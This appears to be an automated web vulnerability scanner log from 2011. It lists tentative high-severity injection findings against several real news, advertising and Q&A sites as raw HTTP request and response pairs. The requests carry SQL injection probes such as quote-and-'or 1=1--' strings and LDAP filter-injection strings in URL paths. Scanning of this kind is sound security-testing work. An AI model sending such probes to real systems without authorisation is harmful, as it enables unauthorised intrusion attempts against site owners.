HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:40 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cssjs'%20and%201%3d2--%20/countdownTimer.js?v Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:40 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /cssjs/countdownTimer.js |
GET /cssjs/countdownTimer.js23080796'%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:27:43 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /cssjs/countdownTimer.js23080796'%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:27:43 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /index.aspx |
GET /index.aspx'%20and%201%3d1--%20?template=ads.ascx&topic Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:28:03 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
GET /index.aspx'%20and%201%3d2--%20?template=ads.ascx&topic Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:28:04 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.answerology |
Path: | /uploaded-images/801818 |
GET /uploaded-images/80181898525213%20or%201%3d1-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10403 Date: Sat, 17 Sep 2011 16:28:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands ...[SNIP]... |
GET /uploaded-images/80181898525213%20or%201%3d2-- Host: www.answerology.com Proxy-Connection: keep-alive Referer: http://www.answerology User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA" Content-Type: text/html; charset=utf-8 Content-Length: 10382 Date: Sat, 17 Sep 2011 16:28:01 GMT Connection: close Vary: Accept-Encoding Cache-Control: no-cache Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns:fb="http://www <head> <title>Answerology Error</title> <meta name="title" content="Answerology Error" /> <met ...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" /> <link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6 <script type="text/javascript" src="/cssjs/jquery.form <script type="text/javascript" src="/cssjs/jquery <script type="text/javascript" src="/fckeditor/fckeditor <script language="JavaScript" type="text/javascript" src="/cssjs/UserRefe <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/Characte <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRi <script language="JavaScript" type="text/javascript" src="/cssjs/countdow <script language="JavaScript" type="text/javascript" src="/cobrands/marie <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag <script language="JavaScript" type="text/javascript" src="/cobrands/cosmo <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen <script language="JavaScript" type="text/javascript" src="/cobrands/goodh <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/opt_out.asp |
GET /managing/opt_out.asp HTTP/1.1 Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:43:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:43:52 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
GET /managing/opt_out.asp HTTP/1.1 Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:43:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:43:54 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/opt_out.asp |
GET /managing/opt_out.asp?130670060'%20or%201%3d1-- Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:44:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:44:06 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
GET /managing/opt_out.asp?130670060'%20or%201%3d2-- Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://networkadvertising User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=1.1392774634 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 16:44:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 16:44:06 GMT Cache-control: no-cache <script> if(location.hostname != 'www.networkadvertising window.location="http:/ } </script> <script> //_______________________ ...[SNIP]... <img width='239' height='45' name='opt_1' src='http://optout.imiclk </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out </td><td valign=top align=center>Opt-Out ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://y.timesunion.com |
Path: | /b/ss/hearstalbanytu/1/H |
GET /b%2527/ss/hearstalbanytu/1/H.21 Host: y.timesunion.com Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:36:58 GMT Server: Omniture DC/2.0.0 Content-Length: 439 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b%27/ss/hearstalbanytu/1 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%2527%2527/ss/hearstalbanytu/1/H.21 Host: y.timesunion.com Proxy-Connection: keep-alive Referer: http://www.timesunion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_pers=%20s_nr%3D131 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:36:58 GMT Server: Omniture DC/2.0.0 xserver: www498 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://ce.lijit.com |
Path: | /merge |
GET /*)(sn=*?pid=2&3pid=439524AE Host: ce.lijit.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: ljtrtb=eJyrVjJUslKyN |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:09:13 GMT Server: PWS/1.7.3.3 X-Px: ms h0-s1023.p10-sjc ( h0-s1004.p10-sjc), ms h0-s1004.p10-sjc ( origin>CONN) Cache-Control: max-age=30 Expires: Sat, 17 Sep 2011 17:09:43 GMT Age: 0 Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /*)(sn=* was not found on this server.</p> <hr> <address>Apache/2.2.14 (Ubuntu) Server at vap.lijit.com Port 80</address> </body></html> |
GET /*)!(sn=*?pid=2&3pid=439524AE Host: ce.lijit.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: ljtrtb=eJyrVjJUslKyN |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:09:14 GMT Server: PWS/1.7.3.3 X-Px: ms h0-s1023.p10-sjc ( h0-s1009.p10-sjc), ms h0-s1009.p10-sjc ( origin>CONN) Cache-Control: max-age=30 Expires: Sat, 17 Sep 2011 17:09:44 GMT Age: 0 Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /*)!(sn=* was not found on this server.</p> </body></html> |
Severity: | High |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_set |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: mc=4e29da7c-0fd05-96398 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 17 Sep 2011 17:19:38 GMT Server: QS |
GET /optout_set?s=nai&nocache Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: mc=4e29da7c-0fd05-96398 |
HTTP/1.1 302 Found Connection: close Set-Cookie: qoo=OPT_OUT; expires=Tue, 14-Sep-2021 17:19:38 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Location: /optout_verify?s=nai Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 17 Sep 2011 17:19:38 GMT Server: QS |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.networkad |
Path: | /managing/optout_results |
